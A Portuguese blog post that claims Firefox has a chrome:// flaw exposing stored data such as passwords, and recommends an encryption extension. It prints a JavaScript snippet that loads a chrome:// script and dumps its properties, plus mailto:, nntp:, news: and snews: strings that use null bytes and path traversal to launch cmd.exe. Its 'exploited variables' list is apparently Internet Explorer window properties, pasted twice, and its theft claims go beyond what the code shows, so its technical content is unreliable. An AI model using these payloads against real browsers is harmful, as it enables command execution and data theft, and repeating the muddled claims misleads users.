Início > Uncategorized > Firefox seguro… Tem certeza? Mas você tem certeza mesmo?

Firefox seguro… Tem certeza? Mas você tem certeza mesmo?

.
Dizem que o Firefox é seguro. Tem certeza? Mas você tem certeza mesmo?
Quando perguntamos com tanta ênfase se alguém tem certeza de algo, depois de uma reação de surpresa, certamente dirá: ‘só temos certeza da morte’. Pois é. Para os defensores do Firefox como sendo um navegador seguro, ao contrário do Internet Exploer, aqui está a má notícia. Ele tem vulnerabilidades sim, iguais ao do IE.
Aí vão dizer que eu sou puxa-saco do Bill Gates. Podem falar o que quiserem, eu sei que não sou.
Explorando a vulnerabilidade é possível ler o valor de todas as variáveis armazenadas no seu Firefox (inclusive aquelas senhas de MSN, Orkut, bancos, etc). Para tanto, lembre-se que todas as variáveis armazenadas no Firefox são criadas a partir de arquivos Javascripts executados remotamente quando acessados. Mas como evitar que isto aconteça? Use a extensão Fire Encrypter – download em http://www.softpedia.com/progDownload/Fire-Encrypter-Download-55225.html
Basicamente, a vulnerabilidade é explorada através da chave de contexto chrome:// presente em todos os arquivos JavaScript, e é criada uma sessão de acesso ao aplicativo através de uma instância Ajax. Infelizmente é possível acessar apenas funções não registradas, como as configuradas por desenvolvedores independentes. Módulo de proteção de bancos previamente instalados não podem ser explorados com esta vulnerabilidade, mas bancos sem módulos de proteção, que você acessou a partir de seu computador, sim, estes dados podem ser copiados.

A vulnerabilidade explora negação de serviço através de chamadas de funções, quebra de privacidade, exibição de informações confidenciais e é tratado como um ‘ataque desconhecido’.

Como esta vulnerabilidade está na chave crhome, vai ser difícil consertar… É como se houvesse um problema no comando <html>, e todas as páginas do mundo fossem então vulneráveis da noite para o dia.

Variáveis exploradas…
onbeforeunload = null
onafterprint = null
top = [objeto]
location = [endereço URL]
parent = [objeto]
offscreenBuffering = auto
frameElement = null
onerror = null
screen = [objeto]
event = null
clipboardData = [objeto]
onresize = null
defaultStatus =
onblur = null
window = [objeto]
onload = null
onscroll = null
screenTop = 112
onfocus = null
Option = [objeto]
length = 0
onbeforeprint = null
frames = [objeto]
self = [objeto]
clientInformation =
external =
screenLeft = 204
opener = undefined
onunload = null
document = [objeto]
closed = false
history = [objeto]
Image = [objeto]
navigator =
status =
onhelp = null
name =
onbeforeunload = null
onafterprint = null
top = [objeto]
location = [endereço URL]
parent = [objeto]
offscreenBuffering = auto
frameElement = null
onerror = null
screen = [objeto]
event = null
clipboardData = [objeto]
onresize = null
defaultStatus =
onblur = null
window = [objeto]
onload = null
onscroll = null
screenTop = 112
onfocus = null
Option = [objeto]
length = 0
onbeforeprint = null
frames = [objeto]
self = [objeto]
clientInformation =
external =
screenLeft = 204
opener = undefined
onunload = null
document = [objeto]
closed = false
history = [objeto]
Image = [objeto]
navigator =
status =
onhelp = null
name =
Ah, mas eu não entendo nada do que está sendo mostrado! Calma gafanhoto. Questão de tempo e prática. Estude lógica e linguagem de programação.
Exemplo de scripts que exploram a vulnerabilidade…
<script src="chrome://global/content/config.js"></script>
<script>
// dump it
function show_all() {
   var chrome = this;
   for (var i in chrome) {
       try {
           document.writeln(i + ‘ = ‘ + chrome[i] +'<br />’);
    } catch(e) { }
  }
}
show_all();
</script>
 
E ainda tem a possibilidade de execução de código remota através dos serviços SMTP, NNTP, NEWS e SNEWS.
Alguns exemplos…
mailto:%00%00../../../../../../windows/system32/cmd".exe ../../../../../../../../windows/system32/calc.exe " – " blah.bat
nntp:%00%00../../../../../../windows/system32/cmd".exe ../../../../../../../../windows/system32/calc.exe " – " blah.bat
news:%00%00../../../../../../windows/system32/cmd".exe ../../../../../../../../windows/system32/calc.exe " – " blah.bat
snews:%00%00../../../../../../windows/system32/cmd".exe ../../../../../../../../windows/system32/calc.exe " – " blah.bat
Categorias:Uncategorized
  1. Nenhum comentário ainda.
  1. No trackbacks yet.

Deixe uma resposta

Preencha os seus dados abaixo ou clique em um ícone para log in:

Logotipo do WordPress.com

Você está comentando utilizando sua conta WordPress.com. Sair / Alterar )

Imagem do Twitter

Você está comentando utilizando sua conta Twitter. Sair / Alterar )

Foto do Facebook

Você está comentando utilizando sua conta Facebook. Sair / Alterar )

Foto do Google+

Você está comentando utilizando sua conta Google+. Sair / Alterar )

Conectando a %s

%d blogueiros gostam disto: